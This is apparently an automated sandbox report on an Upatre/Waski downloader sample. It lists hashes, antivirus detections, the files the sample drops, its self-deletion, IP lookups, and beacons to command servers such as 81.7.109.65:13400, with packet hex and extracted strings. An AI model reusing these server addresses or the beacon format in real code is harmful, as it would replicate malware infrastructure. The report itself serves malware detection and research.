Analysis Date2015-09-15 04:42:04
MD50b3c3f1d5565624f9038bc8b483c2ee9
SHA1e4ca3bdb8ed86fa78f83b872ec22068de9a5211f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Sectiontext md5: c12ed068b3b3ab0d1c0773c803fbb9a6 sha1: 4e5e6800feb4fb0ec1cce589700dca92305eb257 size: 2560
Section.data md5: d9c584c9263cf75eaeb1414fe2c6ab67 sha1: 1c095730f218d83770fed7c31c07e7c6265aae6f size: 11776
Section.rsrc md5: c2f20cb47591ae4578873a5cd2d17151 sha1: 208bc65a7c6a4c994d0d26c8a9d569061814e895 size: 26112
Section.reloc md5: 0cc5bbe02fbbd4072baf45ab541d7f79 sha1: 5d4667afdeba1f62363ceae563779731e6cccfe3 size: 512
Section.DAT md5: 0bf4e4515d86020b9736319461a54411 sha1: e64ce3f5d12f650cb7ea831ccb8b5f2a9c143eac size: 512
Timestamp1997-10-28 22:08:58
PEhashfcc5aab56bee31ec645c989eebd1fea8fb919601
IMPhashc312bb98cf45e74c770b5ff6a8bd003b
AVRising0x5903eb54
AVMcafeeUpatre-FABT!0B3C3F1D5565
AVAvira (antivir)TR/Kryptik.gtas
AVTwisterTrojan.Generic.lbhj
AVAd-AwareTrojan.Agent.BJIS
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVEset (nod32)Win32/TrojanDownloader.Waski.F
AVGrisoft (avg)Crypt4.TLF
AVSymantecDownloader.Upatre!gen9
AVFortinetW32/Waski.F!tr
AVBitDefenderTrojan.Agent.BJIS
AVK7Trojan-Downloader ( 0049d22b1 )
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre.BL
AVMicroWorld (escan)Trojan.Agent.BJIS
AVMalwareBytesSpyware.Dyre
AVAuthentiumW32/Upatre.E.gen
AVFrisk (f-prot)W32/Upatre.E.gen
AVIkarusTrojan.Injector
AVEmsisoftTrojan.Agent.BJIS
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTROJ_UP.DB5F9D28
AVCAT (quickheal)TrojanDwnldr.Upatre.MUE.A5
AVVirusBlokAda (vba32)Trojan.AntiAV
AVPadvishno_virus
AVBullGuardTrojan.Agent.BJIS
AVArcabit (arcavir)Trojan.Agent.BJIS
AVClamAVno_virus
AVDr. WebTrojan.Upatre.201
AVF-SecureTrojan.Agent.BJIS
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\zil7812.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\zilinad.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\zilinad.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\zilinad.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\icanhazip[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\malware.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS46.16.225.236
Winsock DNS81.7.109.65
Winsock DNS85.248.2.228
Winsock DNS95.80.123.41
Winsock DNS5.44.15.70
Winsock DNS128.0.85.11
Winsock DNS91.240.97.54
Winsock DNS46.151.130.90
Winsock DNSicanhazip.com

Network Details:

DNSicanhazip.com
Type: A
104.238.145.30
DNSicanhazip.com
Type: A
104.238.141.75
DNSicanhazip.com
Type: A
104.238.136.31
HTTP GEThttp://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
HTTP GEThttp://81.7.109.65:13400/WANS22/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Flows TCP192.168.1.1:1031 ➝ 104.238.145.30:80
Flows TCP192.168.1.1:1032 ➝ 81.7.109.65:13400
Flows TCP192.168.1.1:1033 ➝ 46.16.225.236:443
Flows TCP192.168.1.1:1034 ➝ 46.16.225.236:443
Flows TCP192.168.1.1:1035 ➝ 46.16.225.236:443
Flows TCP192.168.1.1:1036 ➝ 46.16.225.236:443
Flows TCP192.168.1.1:1037 ➝ 128.0.85.11:443
Flows TCP192.168.1.1:1038 ➝ 128.0.85.11:443
Flows TCP192.168.1.1:1039 ➝ 128.0.85.11:443
Flows TCP192.168.1.1:1040 ➝ 128.0.85.11:443
Flows TCP192.168.1.1:1041 ➝ 5.44.15.70:443
Flows TCP192.168.1.1:1042 ➝ 5.44.15.70:443
Flows TCP192.168.1.1:1043 ➝ 5.44.15.70:443
Flows TCP192.168.1.1:1044 ➝ 5.44.15.70:443
Flows TCP192.168.1.1:1045 ➝ 85.248.2.228:443
Flows TCP192.168.1.1:1046 ➝ 85.248.2.228:443
Flows TCP192.168.1.1:1047 ➝ 85.248.2.228:443
Flows TCP192.168.1.1:1048 ➝ 85.248.2.228:443
Flows TCP192.168.1.1:1049 ➝ 95.80.123.41:443
Flows TCP192.168.1.1:1050 ➝ 95.80.123.41:443
Flows TCP192.168.1.1:1051 ➝ 95.80.123.41:443
Flows TCP192.168.1.1:1052 ➝ 95.80.123.41:443
Flows TCP192.168.1.1:1053 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1054 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1055 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1056 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1057 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1058 ➝ 46.151.130.90:443

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e313b20 72763a33 342e3029   NT 6.1; rv:34.0)
0x00000060 (00096)   20476563 6b6f2f32 30313030 31303120    Gecko/20100101 
0x00000070 (00112)   46697265 666f782f 33342e30 0d0a486f   Firefox/34.0..Ho
0x00000080 (00128)   73743a20 6963616e 68617a69 702e636f   st: icanhazip.co
0x00000090 (00144)   6d0d0a43 61636865 2d436f6e 74726f6c   m..Cache-Control
0x000000a0 (00160)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   47455420 2f57414e 5332322f 434f4d50   GET /WANS22/COMP
0x00000010 (00016)   55544552 2d585858 5858582f 302f3531   UTER-XXXXXX/0/51
0x00000020 (00032)   2d535033 2f302f20 48545450 2f312e31   -SP3/0/ HTTP/1.1
0x00000030 (00048)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000040 (00064)   7a696c6c 612f352e 30202857 696e646f   zilla/5.0 (Windo
0x00000050 (00080)   7773204e 5420362e 313b2072 763a3334   ws NT 6.1; rv:34
0x00000060 (00096)   2e302920 4765636b 6f2f3230 31303031   .0) Gecko/201001
0x00000070 (00112)   30312046 69726566 6f782f33 342e300d   01 Firefox/34.0.
0x00000080 (00128)   0a486f73 743a2038 312e372e 3130392e   .Host: 81.7.109.
0x00000090 (00144)   36353a31 33343030 0d0a4361 6368652d   65:13400..Cache-
0x000000a0 (00160)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x000000b0 (00176)   650d0a0d 0a                           e....

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.


Strings
1uaChn
+[2u{o3er
3\caJR
93}kWsy
9?b5%8
AB@CGF
AmpFactorToDB
(|A;S)$
</assembly>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
AtlAxAttachControl
AtlComPtrAssign
atl.dll
authz.dll
AuthzFreeAuditEvent
AuthziAllocateAuditParams
AuthziFreeAuditEventType
AuthziFreeAuditParams
AuthziFreeAuditQueue
AuthziInitializeAuditEvent
AuthziInitializeAuditEventType
AuthziInitializeAuditParams
AuthziInitializeAuditParamsFromArray
AuthziInitializeAuditParamsWithRM
AuthziInitializeAuditQueue
AuthziLogAuditEvent
AuthziModifyAuditEvent
AuthziModifyAuditEventType
AuthziModifyAuditQueue
AuthziSourceAudit
avicap32.DLL
B@CFG"
B@CGFw
B.data
C^AD6+
capCreateCaptureWindowA
capGetDriverDescriptionA
CFGMGR32.dll
CM_Add_Empty_Log_Conf
CM_Add_Empty_Log_Conf_Ex
CM_Add_IDA
CM_Add_ID_ExA
CM_Add_ID_ExW
CM_Add_IDW
CM_Add_Range
CM_Add_Res_Des
CM_Add_Res_Des_Ex
CM_Connect_MachineA
CM_Connect_MachineW
CM_Create_DevNodeA
CMP_Init_Detection
c;M.Z=
</compatibility>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
CreateMutexA
DecodePointer
DNSAPI.dll
DnsQuery_A
DnsQueryConfig
DnsQueryConfigAllocEx
DnsQueryConfigDword
DnsQueryExA
DnsQueryExUTF8
DnsQueryExW
DnsQuery_UTF8
DnsQuery_W
DnsRecordBuild_UTF8
DnsRecordBuild_W
DnsRecordCompare
DnsRecordCopyEx
DnsRecordListFree
DnsRecordSetCompare
DnsRecordSetCopyEx
DsGetDcCloseW
DsGetDcNameA
DsGetDcNameW
DsGetDcNameWithAccountA
DsGetDcNameWithAccountW
DsGetDcNextA
DsGetDcNextW
DsGetDcOpenA
DsGetDcOpenW
DsGetDcSiteCoverageA
DsGetDcSiteCoverageW
DsGetForestTrustInformationW
DsGetSiteNameA
DsGetSiteNameW
ExitProcess
GetCommandLineA
GetCommState
GetOEMCP
GetWindowsDirectoryA
h.dllhtsrv
I+Ihvr
IsRasmanProcess
j	~\ay
kernel32.dll
*k\R#G
#l3\Gl
MprAdminInterfaceCreate
mprapi.dll
msvcrt.dll
/M(V_O{
N5!\E^
NDdeApi.dll
NDdeGetErrorStringA
netapi32.dll
NOKHJI
!&O_6F
pstorec.dll
PStoreCreateInstance
quartz.dll
RasActivateRoute
RasActivateRouteEx
RasAddConnectionPort
RasAddNotification
RasAllocateRoute
RasBundleClearStatistics
RasBundleClearStatisticsEx
RasBundleGetPort
RasBundleGetStatistics
RasBundleGetStatisticsEx
RasCompressionGetInfo
RasCompressionSetInfo
RasConnectionEnum
RasConnectionGetStatistics
RasCreateConnection
RasDeAllocateRoute
RasDestroyConnection
RasDeviceConnect
rasman.dll
REGAPI.dll
RegBuildNumberQuery
RegCdCreateA
RegCdCreateW
RegCdDeleteA
RegCdDeleteW
RegCdEnumerateA
RegCdEnumerateW
RegCdQueryA
RegCdQueryW
RegCloseServer
RegConsoleShadowQueryA
RegConsoleShadowQueryW
RegDefaultUserConfigQueryA
RegDefaultUserConfigQueryW
.reloc
</requestedExecutionLevel>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false">
</requestedPrivileges>
<requestedPrivileges>
S&9T/7
</security>
<security>
SetErrorMode
SetFilePointer
!This program cannot be run in DOS mode.
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
uem3JRh\sys
W*e51d
-X}`&(]2
xB2j!5J1
X,UR6s
\z|fY3